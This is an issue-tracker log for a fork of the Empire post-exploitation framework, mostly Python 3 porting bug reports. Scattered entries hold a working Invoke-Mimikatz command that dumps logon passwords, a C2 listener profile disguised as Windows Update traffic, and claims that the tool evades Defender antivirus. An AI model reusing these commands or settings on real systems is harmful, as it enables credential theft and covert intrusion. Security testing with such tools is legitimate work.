[2019-10-27 02:29] roseaj opened #5 "Decode string error"
## Empire Version
Python3-hubble-1

## OS Information (Linux flavor, Python version)
Kali Linux, Python 2.7

## Expected behavior and description of the error, including any actions taken immediately prior to the error. The more detail the better.
Error `[!] Exception: decode method has been disabled in newstr` during Python 3 conversion on the following modules:

`/lib/modules/powershell/situatio

[2019-10-27 02:34] roseaj opened #6 "Psinject Error Message"
## Empire Version
Python3-hubble-1

## OS Information (Linux flavor, Python version)
Kali Linux, Python 2.7

## Expected behavior and description of the error, including any actions taken immediately prior to the error. The more detail the better.
Error when executing PSinject on any application (except Explorer).
`/lib/modules/powershell/management/ps_inject.py`

Additional modules that experienc

[2019-10-27 03:23] roseaj opened #7 "Mimikatz dsync hashump error"
## Empire Version
Python3-hubble-1

## OS Information (Linux flavor, Python version)
Kali Linux, Python 2.7

## Expected behavior and description of the error, including any actions taken immediately prior to the error. The more detail the better.

Error when running dsync hashump from mimikatz.
`/credentials/mimikatz/dcsync_hashdump
`

## Screenshot of error, embedded text output, or Pastebin lin

[2019-10-27 03:31] Cx01N opened #8 "Invoke_ReverseDNSlookup error"
## Empire Version
python3-hubble-1

## OS Information (Linux flavor, Python version)
Kali 2019.3, Python 2.7

## Expected behavior and description of the error, including any actions taken immediately prior to the error. The more detail the better.
The following error occurs when running reverse dns.
`/lib/modules/powershell/situational_awareness/network/reverse_dns.py`

## Screenshot of error, em

[2019-10-28 01:11] lonewolf210 commented on #5
fixed in most recent commit to python3-hubble-1

[2019-10-28 01:43] Hubbl3 opened #9 "Shell does not return warning when access is denied"
## Empire Version
python3-hubble-1

## OS Information (Linux flavor, Python version)
Kali 19.3, Python 2.7

## Expected behavior and description of the error, including any actions taken immediately prior to the error. The more detail the better.
Shell is meant to execute a provided Powershell command. However, if access is denied (while system), the command appears to be executed but there is no

[2019-10-29 12:14] sh1va73 opened #10 "install error"
I followed the install instructions but i am getting an error in Kali when I try to start Empire after install:
Traceback (most recent call last):
  File "./empire", line 13, in <module>
    from lib.common import empire, helpers
  File "/opt/Empire/lib/common/__init__.py", line 8, in <module>
    import helpers
  File "/opt/Empire/lib/common/helpers.py", line 50, in <module>
    import iptools
Im

[2019-10-29 12:17] sh1va73 commented on #10
Also after trying trying pip install -r requirements.txt I get this error:

  ERROR: Command errored out with exit status 1:
   command: /usr/bin/python /usr/local/lib/python2.7/dist-packages/pip/_vendor/pep517/_in_process.py get_requires_for_build_wheel /tmp/tmpR6ybXR
       cwd: /tmp/pip-install-UZzuYm/pyinstaller
  Complete output (10 lines):
  Traceback (most recent call last):
    File "/usr/

[2019-10-29 13:54] roseaj commented on #10
What branch of Empire and version of Kali are you running?

[2019-10-29 14:01] roseaj commented on #5
Confirmed fix.

[2019-10-29 14:01] #5 closed

[2019-10-29 14:09] sh1va73 commented on #10
I used the Empire version from your repo. I think this is 2.3.0
I am running   Linux kali 5.2.0-kali3-amd64 #1 SMP Debian 5.2.17-1kali2 (2019-10-17) x86_64 GNU/Linux

[2019-10-29 14:23] roseaj commented on #10
If Empire displays version 2.3 then you may be on an older version.
Type `./empire --version` to confirm that it is "2.5 BC-Security Fork".

[2019-10-29 14:31] sh1va73 commented on #10
I can not check because I get error when I do ./empire
But I did git clone from your page here.

[2019-10-29 14:55] lonewolf210 commented on #10
I will attempt to trouble shoot this when I get home from work. Are you running this as a VM? And if so did you download the prebuilt VM image or the iso?

If you are in fact on version 2.3 then something went wrong in the git clone process as our current version is 2.5.

Until I am able to try and reproduce the error I would start with running.

`apt-get update`
`apt-get upgrade`

And trying to r

[2019-10-29 14:59] sh1va73 commented on #10
Thanks I will try again to install. Pip works fine on other tools.

[2019-10-29 15:04] lonewolf210 commented on #10
Since we built the install instructions we have merged the dev changes into the main branch.
You can try this instead for the clone and see if it helps:
`git clone https://github.com/BC-SECURITY/Empire.git`

If the pip install error persists please let us know. Like I said of you are still having trouble after i get off work I will attempt to reproduce it when I get home.

For future issues it wou

[2019-10-29 15:43] roseaj opened #11 "Incorrect port number being passed"
## Empire Version
python3-hubble-1

## OS Information (Linux flavor, Python version)
Kali 2019.3, Python 2.7

## Expected behavior and description of the error, including any actions taken immediately prior to the error. The more detail the better.
`Edit Port` should change the port that Empire uses to establish a connection. However, Empire is defaulting to port 80 even if the port is set to anot

[2019-10-29 16:22] roseaj opened #12 "Stager encoding error in Python 3"
## Empire Version
python3-hubble-1

## OS Information (Linux flavor, Python version)
Kali 2019.3, Python 3

## Expected behavior and description of the error, including any actions taken immediately prior to the error. The more detail the better.
Error prompts when executing the stager `multi/launcher` with the `http listener` in Python 3 which is not present in Python 2.7. The error message is `[

[2019-10-29 23:03] lonewolf210 commented on #10
@sh1va73  were you able to get it installed? I haven't been able to reproduce the error you got.

[2019-10-30 03:12] lonewolf210 commented on #10
@sh1va73  what branch did you download off of?

If it was off of the python3-hubble-1 branch the issue is probably that the initial launch script (the empire file in the top level Empire folder) is probably set to python 3 and the reason you are getting that error is that iptools is installed in your 2.7 dist packages folder but not your python 3 folder.

The python3-hubble-1 branch is not stable

[2019-10-30 19:10] lonewolf210 commented on #10
@sh1va73 can you post what commands you used to clone the project to your machine?

Also can you try running `pip3 install -r requirements.txt` from the setup folder and then run the install.sh and tell me what happens?

[2019-10-30 21:35] sh1va73 commented on #10
This is the command I used:
git clone https://github.com/BC-SECURITY/Empire.git

When I do pip3 install -r requirements.txt I get a M2Crypto errors:

` Building wheel for M2Crypto (setup.py) ... error
  ERROR: Command errored out with exit status 1:
   command: /usr/bin/python3 -u -c 'import sys, setuptools, tokenize; sys.argv[0] = '"'"'/tmp/pip-install-9hwnfqd9/M2Crypto/setup.py'"'"'; __file__='"

[2019-10-30 21:56] lonewolf210 commented on #10
@sh1va73 at this point I don't think it's a problem with Empire. We haven't been able to reproduce your problem and the errors you are getting are a bit unusual. I would try using a different distro of Kali or reinstalling the one you have.

[2019-10-30 21:59] sh1va73 commented on #10
I will try on my other device and see what happens there, I keep you posted.

[2019-10-30 22:23] sh1va73 commented on #10
I just tried to install on a fresh Kali and now it works. So there must be something wrong with Kali on the other device. Thanks for the support.

[2019-10-30 22:48] sh1va73 commented on #10
The same issue with M2crypto was reported here:
https://github.com/EmpireProject/Empire/issues/1223

[2019-10-31 00:36] roseaj commented on #10
Issue resolved with new Kali image.

[2019-10-31 00:36] #10 closed

[2019-11-02 05:27] #11 closed

[2019-11-02 20:48] #6 closed

[2019-11-06 03:55] roseaj opened #13 "Python 3: Autofill with interact fails"
## Empire Version
python3-hubble-1

## OS Information (Linux flavor, Python version)
Kali 2019.3, Python 3

## Expected behavior and description of the error, including any actions taken immediately prior to the error. The more detail the better.
Double-tapping tab should give provide all available agents when using `interact`

## Screenshot of error, embedded text output, or Pastebin link to the

[2019-11-06 04:03] Cx01N opened #14 "Access listeners and stagers from any menu"
## Empire Version
python3-hubble-1

## OS Information (Linux flavor, Python version)
Kali 2019.3, Python 3

## Expected behavior and description of the error, including any actions taken immediately prior to the error. The more detail the better.
Current functionality does not allow commands to be ran from the main menu.

## Screenshot of error, embedded text output, or Pastebin link to the error

[2019-11-08 04:08] roseaj opened #15 "Python 3: Mimikatz byte-like object error"
## Empire Version
python3-hubble-1

## OS Information (Linux flavor, Python version)
Kali 2019.3, Python 3

## Expected behavior and description of the error, including any actions taken immediately prior to the error. The more detail the better.
Running `mimikatz` from python3 gives the error message

Running `mimikatz` a second time after a few minutes will give the correct readout but still pro

[2019-11-08 04:25] roseaj commented on #12
Updated stager code to work with Python 2/3.

![image](https://user-images.githubusercontent.com/20302208/68449617-b7e53800-019c-11ea-8e52-9890e66676ed.png)

[2019-11-08 04:25] #12 closed

[2019-11-08 04:30] roseaj commented on #8
Powershell error has been fixed. However, the task does not return a result and crashes the listener.

[2019-11-11 00:09] Invoke-Mimikatz opened #16 "Long running modules lock up agents"
## Empire Version
[Version] 2.5 BC-Security Fork

## OS Information (Linux flavor, Python version)
Python 2.7.16, Kali GNU/Linux, version 2019.2

## Expected behavior and description of the error, including any actions taken immediately prior to the error. The more detail the better.
Expected behaviour: An agent runs a long running job.  The agent continues to beacon back to C2 server, and the age

[2019-11-11 19:15] roseaj opened #17 "Http_hop unexpected token in expression"
## Empire Version
Empire 2.5
python3-hubble-1

## OS Information (Linux flavor, Python version)
2019.3
2018.4

## Expected behavior and description of the error, including any actions taken immediately prior to the error. The more detail the better.
`Http_hop` should establish a connection to the apache server and redirect to Empire to launch the stager. Instead, PowerShell is throwing an error th

[2019-11-11 19:28] roseaj commented on #16
I can confirm that this issue is present on the current 2.5 build and the new dev build.

![image](https://user-images.githubusercontent.com/20302208/68614707-55c75400-0476-11ea-9cd3-e6273eccdd50.png)

[2019-11-11 19:31] roseaj commented on #15
Fixed error.

[2019-11-11 19:31] #15 closed

[2019-11-11 19:33] roseaj commented on #13
The issue was fixed and tab complete now works with Python 2 & 3.

![image](https://user-images.githubusercontent.com/20302208/68614956-eb62e380-0476-11ea-8a1e-619927cbe6c6.png)

[2019-11-11 19:33] #13 closed

[2019-11-11 19:37] roseaj commented on #7
Initial error fixed. The module returns a table of hashes, but gets a PowerShell error `Specified cast is not valid.`

![image](https://user-images.githubusercontent.com/20302208/68615146-590f0f80-0477-11ea-9b8e-209c7b092a22.png)

[2019-11-13 05:45] roseaj opened #18 "Http_hop generates no routing packet"
## Empire Version
Empire 2.5/3.0

## OS Information (Linux flavor, Python version)
Kali 2019.3, Python 2/3

## Expected behavior and description of the error, including any actions taken immediately prior to the error. The more detail the better.
The relay from the apache2 server on ubuntu should forward traffic to Empire. The packets appear to be arriving, but they are missing information that al

[2019-11-16 22:29] #17 closed

[2019-11-17 01:38] #7 closed

[2019-11-22 05:33] #18 closed

[2019-12-02 14:31] Hubbl3 opened #23 "Orphaned agents are not handled properly"
## Empire Version
3.0 beta

## OS Information (Linux flavor, Python version)
Kali 2019.3

## Expected behavior and description of the error, including any actions taken immediately prior to the error. The more detail the better.
If all agents are removes the db with an active agent running when the agent checks back in an error is thrown and it produces a new agent check in everytime that agent ca

[2019-12-03 05:07] Hubbl3 opened #24 "Set Port overwrites HTTPS"
## Empire Version
3.0 Beta

## OS Information (Linux flavor, Python version)
Kali 2019.3 python 3.7

## Expected behavior and description of the error, including any actions taken immediately prior to the error. The more detail the better.
When using https if the Port is set after host then the host "https://"  gets overwritten back to "http://"

## Screenshot of error, embedded text output, or Pa

[2019-12-05 05:54] #24 closed

[2019-12-05 05:54] Hubbl3 commented on #24
Fixed by Cx01N

[2019-12-05 13:26] Hubbl3 commented on #23
The issue has been isolated to python 3.x only. When run as python 2.7 the issue does not occur. The problem seems to be related to the session ID not updating in agents.py when the orphaned agent rechecks in

[2019-12-07 07:53] #23 closed

[2019-12-07 07:53] #14 closed

[2019-12-08 04:09] Cx01N opened #26 "Agent cross compatibility with Python"
## Empire Version
3.0 beta

## OS Information (Linux flavor, Python version)
Kali 2019.3

## Expected behavior and description of the error, including any actions taken immediately prior to the error. The more detail the better.
An existing agent that was generated using Python 2.7 cannot be used if a new instance of Empire is setup using Python 3.x. It would be ideal to update the agents to be co

[2019-12-09 05:20] Cx01N commented on #8
![image](https://user-images.githubusercontent.com/20302208/70409401-814f4700-1a00-11ea-8dd3-3173c69b16d3.png)

Error fixed, closing issue.

[2019-12-09 05:20] #8 closed

[2019-12-11 00:23] xploitx opened #28 "BCS Empire"
Hey, sorry if this is not the right place to ask, what makes this version different from the real empire?
Anything other than mentioned in wiki?

[2019-12-11 05:09] Cx01N commented on #28
Thank you for reaching out.

The Empire Wiki has not been updated in a while, but that is something that we will need to add to our To-Do list. However, you can find a list of updates in our [change log](https://github.com/BC-SECURITY/Empire/blob/dev/changelog). Our project has successfully ported Empire over to be both Python 2 and 3 compatibility with some new features and will be supported by K

[2019-12-11 05:12] xploitx commented on #28
How is the persistence working so far? I think the method used in the original Empire doesn't work in latest Win 10 Update, anyway I'm gonna try this, thanks for the heads up and I hop you people will maintain with much updates to make Empire great again.

[2019-12-11 06:32] Hubbl3 commented on #28
If you are referring to AV evasion it now evades Defender out of the box with things like ps-inject and mimikatz running without causing alerts. If you mean something else could you provide an example module you are interested?

[2019-12-11 10:05] xploitx commented on #28
Thank you for the reply, I would like to know if any of persistence works like charm?
https://www.powershellempire.com/?page_id=139

Thank you.

[2019-12-11 14:17] Hubbl3 commented on #28
Gotcha. We have not gotten around to testing those modules yet. We would love it if you were able to test some of them and let us know if you encounter any errors.

Most of the things that caused Empire to be detected by AV were related to some bugs in the launcher code. So as long as the module itself works (we have encountered several modules that were simply broken in 2.5 regardless of detectio

[2019-12-11 14:47] xploitx commented on #28
Awesome then, I will spare time to test and report bugs or any troubleshoot to make this great again, thanks for heads up!

I was able to execute a payload once and successfully bypassed UAC, but mimikatz staged task and was in pending jobs forever, tried couple of times and now none of my target machines are listening, it is executing the powershell but no feedback in  Empire, I'm testing it in W

[2019-12-11 14:54] Hubbl3 commented on #28
I just tested the userland/registry persistence module and it is working without issue.

That is likely related to the open issue about long running modules locking up. We are working on solving that. Also make sure you are on the dev branch and not the master. Most of the upgrades have not yet been pulled into the master as we are still in beta testing.

[2019-12-11 15:02] xploitx commented on #28
That's great, my bad I'm using 2.5 and that might be the issue I'm facing, gonna clone dev branch now, I will test the userland/registry and revert back, thank you.

[2019-12-11 15:36] #28 closed

[2019-12-24 05:35] rossiV1 opened #30 "Exception Error"
## Empire Version
[Version] 3.0 BC-Security Fork

## OS Information (Linux flavor, Python version)
Ubuntu 18.04, Python 3.6.9

## Expected behavior and description of the error, including any actions taken immediately prior to the error. The more detail the better.
`usestager windows/macro` when execute should output a macro file

but when execute above, it shows error `Exception: module 'string'

[2019-12-24 08:35] rossiV1 commented on #30
i found error when uploading a file using to agent that is connected when using the command`upload`

Error is: `[!] Exception: 'utf-8' codec can't decode byte 0x90 in position 2: invalid start byte
`

[2019-12-24 16:25] Cx01N commented on #30
We added the updates to [3.0-bug-fixes](https://github.com/BC-SECURITY/Empire/tree/3.0-bug-fixes) for testing before rolling it out. We aren't seeing the issues anymore, so let us know if it still present.

[2019-12-24 22:07] Hubbl3 commented on #16
Been spending some time trying to isolate the issue. The Empire 2.5 master branch runs without locking up the agent but this bug is also present in the Empire 2.5 Dev branch. That also coincides with some updates to agent.

My best guess right now is that an update broke the multi threading as the agents continue to run through the module logic loops. They just become unresponsive both on the comp

[2019-12-25 05:12] Invoke-Mimikatz commented on #30
I'm not sure if this belongs in a new issue or not, but it seems similar enough to the ones above.  The theme seems to be a difference between string and byte array[] and how Empire handles them.

<img width="925" alt="str_byte" src="https://user-images.githubusercontent.com/57604669/71433077-80761080-26a2-11ea-909f-aa672a988d72.png">

[2019-12-25 06:22] bsrinivasguptha opened #31 "Unable to print creds saved by mimikatz"
## Empire Version
3.0

## OS Information (Linux flavor, Python version)
Linux kali 5.3.0-kali2-amd64 #1 SMP Debian 5.3.9-3kali1 (2019-11-20) x86_64 GNU/Linux
Python 3.7.5

## Expected behavior and description of the error, including any actions taken immediately prior to the error. The more detail the better.
Below are the series of commands executed:
[code]

## Screenshot of error, embedded text

[2019-12-25 07:22] qiaomu2333 opened #32 "Can you add a ms17-010 module,plz"
Can you add a ms17-010 module,plz

[2019-12-25 11:28] pr0code opened #33 "no start"
## Empire Version
3.0

## OS Information (Linux flavor, Python version)

Linux version 5.3.0-kali3-amd64 (devel@kali.org) (gcc version 9.2.1 20191130 (Debian 9.2.1-21)) #1 SMP Debian 5.3.15-1kali1 (2019-12-09)

## Expected behavior and description of the error, including any actions taken immediately prior to the error. The more detail the better.

root@kali:~/Empire# ./empire
./empire:9: Deprecat

[2019-12-25 11:35] pr0code commented on #33
i am start **./reset.sh** and it's worK))
================================================================================
 [Empire]  Post-Exploitation Framework
================================================================================
 [Version] 3.0 BC-Security Fork | [Web] https://github.com/BC-SECURITY/Empire
===============================================================================

[2019-12-25 11:35] #33 closed

[2019-12-25 14:48] rossiV1 commented on #30
hi again. i tried the new update with a fresh install server. cannot load empire due to this error

Traceback (most recent call last):
  File "./empire", line 1424, in <module>
    main = empire.MainMenu(args=args)
  File "/opt/Empire/lib/common/empire.py", line 97, in __init__
    (self.isroot, self.installPath, self.ipWhiteList, self.ipBlackList, self.obfuscate, self.obfuscateCommand) = helpers.

[2019-12-25 14:52] rossiV1 commented on #30
sorry, i fixed this by using the command `./setup/reset.sh` and install all the other dependencies.

[2019-12-25 14:57] rossiV1 commented on #30
hello. i am still seing the bug when using the windows/macro.

currently using fresh install ubuntu 18.04

[2019-12-25 15:11] rossiV1 commented on #30
and the error when upload file is still there.

[2019-12-25 15:31] Cx01N commented on #30
You may still be on the 3.0 branch instead of the hotfixes branch. If you run the following commands from the Empire folder.
[code]

Which version does it say you are running?

[2019-12-25 15:45] rossiV1 commented on #30
ahhh sorry. i did not pull the correct branch. thank you for the info above

[2019-12-25 16:32] rossiV1 commented on #30
i realised the error will come when trying to upload a file that is bigger in size. when i upload a normal txt file, it can manage to upload.
but when i try to upload a exe file, it will show this error `[!] Exception: 'utf-8' codec can't decode byte 0x90 in position 2: invalid start byte`

[2019-12-25 17:33] Hubbl3 commented on #31
@srinivasguptha we will address this shortly but this is a bug caused by the 2.7 to 3.x conversion. If you run it in 2.7 the error should go away as temporary work around

[2019-12-25 21:01] Invoke-Mimikatz commented on #31
Running Empire 3.0.1 (bugfix branch) in python2 fails with the error below:

<img width="917" alt="image" src="https://user-images.githubusercontent.com/57604669/71450426-371bd480-2727-11ea-9cb5-f85d90a92d2e.png">

Running Python version 2.7.17

[2019-12-25 21:31] Hubbl3 commented on #31
@Invoke-Mimikatz  you need to run reset.sh when switching between versions. The pickle protocol doesn't seem to be version agnostic

[2019-12-25 21:32] Cx01N commented on #31
You will have to run reset.sh if you switch between python 2 and 3. We currently don't have a way to switch without clearing the database first.

[2019-12-25 23:13] CoffeeNData opened #34 "ModuleNotFoundError: No module named 'pydispatch' (and more)"
## Empire Version
3.0

## OS Information (Linux flavor, Python version)
Kali Linux, Python 3.7.5 and Python 2.7.17

## Expected behavior and description of the error, including any actions taken immediately prior to the error. The more detail the better.

I've just installed Empire, which gave me a few errors in the installation script. I runt it again and prompted no problems. The thing comes whe

[2019-12-26 01:23] Hubbl3 commented on #34
From `./Empire/setup` try running `pip3 install -r requirements.txt`

[2019-12-26 06:53] dickens88 opened #35 "Can not display creds after build golden ticket"
## Empire Version
3.0

## OS Information (Linux flavor, Python version)
latest docker image

## Expected behavior and description of the error, including any actions taken immediately prior to the error. The more detail the better.
Hi ,

I follow [this vedio](https://youtu.be/ns7M6zjWDrs) to test in my testing env, i can get krbtgt and make golden ticket like this,

![image](https://user-images.gi

[2019-12-26 08:44] Hubbl3 commented on #31
@bsrinivasguptha  and @Invoke-Mimikatz . I just pushed a commit to the 3.0-bug-fixes branch that fixes the issue

[2019-12-26 15:21] Cx01N commented on #35
Duplicate issue with #31.
Creds should now properly be printed in the [3.0-bug-fixes](https://github.com/BC-SECURITY/Empire/tree/3.0-bug-fixes) branch.

[2019-12-26 15:21] #35 closed

[2019-12-26 15:30] CoffeeNData commented on #34
Thanks. It prompted another error (which I can't remember), but it solved running `./Empire/setup/reset.sh`

[2019-12-26 15:31] #34 closed

[2019-12-26 15:59] Cx01N commented on #30
The check for file sizes larger than 1 MB should now work on the 3.0-bug-fixes branch and you will receive this message when trying to upload large files.
`[!] File size is too large. Upload limit is 1MB.`

Thank you for working through this issue with us.

[2019-12-26 22:08] LaZyDK opened #37 "Powershell missing in docker - Debian 10 Buster"
## Empire Version
[Version] 3.0 BC-Security Fork

## OS Information (Linux flavor, Python version)
Debian 10 Buster
Python 3.7.5
from Docker image: python:3.7.5-buster

## Expected behavior and description of the error, including any actions taken immediately prior to the error. The more detail the better.
`uselistener http`
`set Name httptest`
`set Host http://c2.example.com:443`
`set BindIP 0.0.

[2019-12-26 22:22] LaZyDK commented on #37
This will install powershell from Debian 9 Stretch on Debian 10 Buster:
[code]

[2019-12-26 22:56] Hubbl3 commented on #16
@Invoke-Mimikatz I just pushed a commit that should have fixed this issue. Let me know if it still persists.

[2019-12-27 03:52] vinnybod commented on #37
Thanks for your contribution. Got this corrected in https://github.com/BC-SECURITY/Empire/pull/38

Keeping this issue open however, because using your steps, I am having issues with the obfuscation command within the docker container.

[2019-12-27 05:44] vinnybod commented on #37
The fix is merged in. You should be able to run these commands using the the `:latest` container.

[2019-12-27 05:44] #37 closed

[2019-12-27 06:24] #30 closed

[2019-12-27 23:56] #16 closed

[2019-12-28 03:10] blshkv opened #39 "create a proper setup.py and support system-wide installation"
I'm not sure if I need to explain.

It should be possible to install the tools using the standard command:
```python setup.py install```
 or
```python setup.py install --user```

Once started, it should create a local folder for each user and do post-configuration (certs, database) in a local folder, something like ```~./empire/*```

This is important for distro packaging (I'm pentoo developer). I

[2019-12-28 03:20] blshkv commented on #39
https://github.com/laramies/theHarvester/pull/229/files if you need an example.

[2019-12-28 05:16] #31 closed

[2019-12-28 16:35] dsturge01 opened #40 "Onedrive Listener typeError Exception"
## Empire Version
3.0.3

## OS Information (Linux flavor, Python version)
5.3.0-kali3-amd64 #1 SMP Debian 5.3.15-1kali1 (2019-12-09) x86_64 GNU/Linux
Error observed on 2, 2.7, 3, 3.7

## Expected behavior and description of the error, including any actions taken immediately prior to the error. The more detail the better.
Set ClientID, ClientSecret, Authcode, and execute. The listener runs, but the

[2019-12-28 19:18] MangoHiller opened #42 "Stager generation fails, generate_launcher() got an unexpected keyword"
## Empire Version
3.0 BC-Security Fork

## OS Information (Linux flavor, Python version)
Linux kali 5.3.0-kali3-amd64  SMP Debian 5.3.15-1kali1 (2019-12-09) x86_64 GNU/Linux
Python 3.7.5

## Expected behavior and description of the error, including any actions taken immediately prior to the error. The more detail the better.
Same error as https://github.com/EmpireProject/Empire/issues/1345 so i pa

[2019-12-29 19:23] Invoke-Mimikatz opened #43 "Internal Monologue runs only once for each agent"
## Empire Version
3.0 Bug Fixes

## OS Information (Linux flavor, Python version)
Kali 2019.2, Python 3.7.5

## Expected behavior and description of the error, including any actions taken immediately prior to the error. The more detail the better.
Expected behaviour: invoke_internal_monologue module dumps the same NetNTLMv1 hashes every time, once for each run of the module.

Observed behaviour: i

[2019-12-29 19:39] Invoke-Mimikatz commented on #16
Tested this out with keylogger and it seems to run correctly as a background job now.

[2019-12-29 19:56] Invoke-Mimikatz opened #44 "Add a progress bar or byte counter for downloads"
Would be very nice to have either a progress bar or a status showing (bytes downloaded / total bytes) for file downloads.

Otherwise I just get this, and have no idea if my download is going to take 5 minutes or an hour:

<img width="575" alt="image" src="https://user-images.githubusercontent.com/57604669/71561947-07304200-2a43-11ea-944b-f8d21a839f0b.png">

[2019-12-30 10:09] Z6543 opened #47 "pip3 vs pip"
## Empire Version
3.0

## OS Information (Linux flavor, Python version)
Kali Rolling

## Expected behavior and description of the error, including any actions taken immediately prior to the error. The more detail the better.
The setup does not install the necessary python3 packages. On my system, pip links to pip2 and not pip3.

## Screenshot of error, embedded text output, or Pastebin link to the

[2019-12-30 12:57] LaZyDK opened #48 "'sysinfo': a bytes-like object is required"
## Empire Version
3.0 BC-Security Fork

## OS Information (Linux flavor, Python version)
Debian 10 Buster
Python 3.7.5
from Docker image: python:3.7.5-buster
Pulled: 2019-12-30

## Expected behavior and description of the error, including any actions taken immediately prior to the error. The more detail the better.
I am able to interact with an agent to and successfully run "whoami" command.
If I

[2019-12-30 15:20] Hubbl3 commented on #47
@Z6543 we are aware of the issue and are working to resolve

[2019-12-30 15:20] Hubbl3 commented on #47
@Z6543 we are aware of the issue and are working to resolve

[2019-12-30 15:23] Hubbl3 commented on #48
@LaZyDK  we just merged over the 3.0-bug-fixes branch to the master branch which should have addressed this problem.

[2019-12-30 17:01] malpais opened #49 "RESTapi broken with py2 -> py3 ?"
## Empire Version
3.0

## OS Information (Linux flavor, Python version)
Kali 2019.4

## Expected behavior and description of the error, including any actions taken immediately prior to the error. The more detail the better.
Trying to use RESTapi

## Screenshot of error, embedded text output, or Pastebin link to the error
./DeathStar.py
[*] Powering up the Death Star
[*] Polling for agents
Tracebac

[2019-12-30 19:17] dllaboss opened #50 "Cannot run ./empire"
## Empire Version
3.0.1 (from 'cat VERSION' via Terminal')

## OS Information (Linux flavor, Python version)
Kali-rolling v2019.4
Python 2.7.17 and/or Python 3.7.5

## Expected behavior and description of the error, including any actions taken immediately prior to the error. The more detail the better.
When running "./empire" I receive the following error:
Traceback (most recent call last):
  File

[2019-12-30 22:23] barrett092 commented on #47
even when installed, I get a "TypeError: cannot unpack non-iterable NoneType object"

[2019-12-31 02:59] h0nus opened #51 "Error creating linux python payload"
## Empire Version
3.0.1 BC-Security Fork

## OS Information (Linux flavor, Python version)
Python 3.7.5 ( with python2 i got the default behaviour)
Ubuntu 19.10 x86_64

## Expected behavior and description of the error, including any actions taken immediately prior to the error. The more detail the better.
I was expecting the usual base64 encoded python stager launched from bash.
Like: `echo "base

[2019-12-31 03:07] h0nus opened #52 "500 on Client handling and Payload incorrect"
## Empire Version
3.0.1 BC-Security Fork

## OS Information (Linux flavor, Python version)
Ubuntu 19.10 x86_64
Python 2.7.17 (because using Python3 results in failing to generate payload for *nix)

## Expected behavior and description of the error, including any actions taken immediately prior to the error. The more detail the better.
It should handle the connection, but instead gives a 500 error

[2019-12-31 03:56] Cx01N commented on #48
@LaZyDK It appears that you are running an older version. If you redownload as empire:latest, it should be version 3.0.1 and this will correct the issue. I just tested it and this error appears to be correct. Please let us know if you are still seeing something.

[2019-12-31 04:29] Hubbl3 commented on #52
@h0nus can you provide a little more information? Which nix payload were you trying generate? Also it looks like you sent an exit command in the middle of a negotiation

[2019-12-31 07:10] corabrickdog commented on #50
Try running pip3 install -r setup/requirements.txt after ./install.sh as @Z6543 said in #47 :)

[2019-12-31 19:36] Hubbl3 commented on #42
Try running a pip3 install on the requirements .txt

I just pushed a commit to the bug fix branch that ensures python 3 dependencies are installed when running the install.sh.

[2019-12-31 19:36] #42 closed

[2019-12-31 22:59] Cx01N commented on #51
@h0nus It appears that the old python launchers will not be compatible with how Python 3 is being implemented. We are working through the issue now, but it may require a major overhaul on how Empire handles python agents.

[2020-01-01 00:27] Hubbl3 commented on #47
@Z6543 I have pushed a new install.sh to the bug fixes branch that resolves this issue

[2020-01-01 00:27] #47 closed

[2020-01-01 00:29] Hubbl3 commented on #50
As @corabrickdog said this is the same issue as #47. I have pushed an update to the bug fixes branch that addresses this and am closing the issue

[2020-01-01 00:29] #50 closed

[2020-01-01 03:57] blshkv commented on #39
https://www.kali.org/news/kali-default-non-root-user/ this news came up just in time. Hopefully, you can put more effort now

[2020-01-01 09:19] merrychrishna opened #53 "invoke-mimikatz.ps1 minidump is not creating .dmp file. error 0x2 file not found."
## Empire Version
empire 3.0

## OS Information (Linux flavor, Python version)
Windows 10 64 bit Powershell

## Expected behavior and description of the error, including any actions taken immediately prior to the error. The more detail the better.
invoke-mimikatz.ps1 sekurlsa::minidump command is not creating lsass.dmp file even when running file as administrator. I searched my entire c drive but

[2020-01-01 18:14] Cx01N commented on #53
This appears to be similar to a few other issues within mimikatz.
https://github.com/gentilkiwi/mimikatz/issues/226
https://github.com/gentilkiwi/mimikatz/issues/248
https://github.com/gentilkiwi/mimikatz/issues/208

We will be sure to keep our tool updated with the latest tool.

[2020-01-01 18:21] merrychrishna commented on #53
I managed to get it working with this command
Invoke-Mimikatz -Command '"log %TEMP%\mimikatz.log" "privilege::debug exit" "sekurlsa::logonpasswords" "sekurlsa::tspkg"'

So it just doesn't work when you specify the file and path for mimikatz to output the dmp file to.

[2020-01-01 19:14] Cx01N commented on #53
@merrychrishna glad to hear you found a fix. Let us know if you find something we can do on our end.

[2020-01-01 19:16] Cx01N commented on #39
@blshkv We have been working to update the install file and a few other bug fixes. but this is definitely on our list to accomplish soon. Thank you.

[2020-01-01 20:24] h0nus commented on #51
Yeah, i needed to fix the launcher, but also the connection have errors in handling the staging process.

[2020-01-02 07:27] rossiV1 opened #54 "sysinfo"
## Empire Version
3.0.1 BC-Security Fork

## OS Information (Linux flavor, Python version)
Ubuntu 18.04, Python 3.6.9

## Expected behavior and description of the error, including any actions taken immediately prior to the error. The more detail the better.
when running sysinfo on connected agents, it returned some error.

## Screenshot of error, embedded text output, or Pastebin link to the error

[2020-01-02 08:08] LaZyDK commented on #48
@Cx01N
It still does not work. Has the docker image been rebuild with the new bug fixes yet?

[2020-01-02 10:56] LaZyDK commented on #48
I get the same error when I pull the v3.0.1 branch.

[2020-01-02 10:58] LaZyDK commented on #54
Copy of #48

[2020-01-02 23:33] Hubbl3 commented on #48
@LaZyDK  I just pulled a docker image using `docker pull bcsecurity/empire:v3.0.1` and am unable to produce an error. Are you using a python or powershell agent?

[2020-01-02 23:34] Hubbl3 commented on #54
@rossiV1 I am unable to produce an error with sysinfo are you using a python or powershell agent?

![image](https://user-images.githubusercontent.com/42596432/71699638-28b46500-2d86-11ea-873f-20a635cf31a8.png)

[2020-01-03 02:01] rossiV1 commented on #54
i am using powershell agent.
for the listener:

uselistener http
set Name microsoftupdate
set DefaultJitter 20
set DefaultDelay 6
set DefaultProfile /c/msdownload/update/others/2013/11/9946821_f5082b842c8abc5c47cfc68f98340ec384b69fa9.cab,/c/msdownload/update/software/ftpk/2013/11/ie-spelling-nl_3576e6450352dfc0c0892bf62384e75a56d780a7.msu|Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.40|

[2020-01-03 02:03] Hubbl3 commented on #32
@qiaomu2333  this module already exists in Empire as Exploit-EternalBlue.

Closing this issue

[2020-01-03 02:03] #32 closed

[2020-01-03 02:08] Hubbl3 commented on #54
@rossiV1 can you also provide me with the command you used to pull down empire?

[2020-01-03 02:39] rossiV1 commented on #54
I used same command from the github page. when i found error i just use `reset.sh` and install the dependencies.

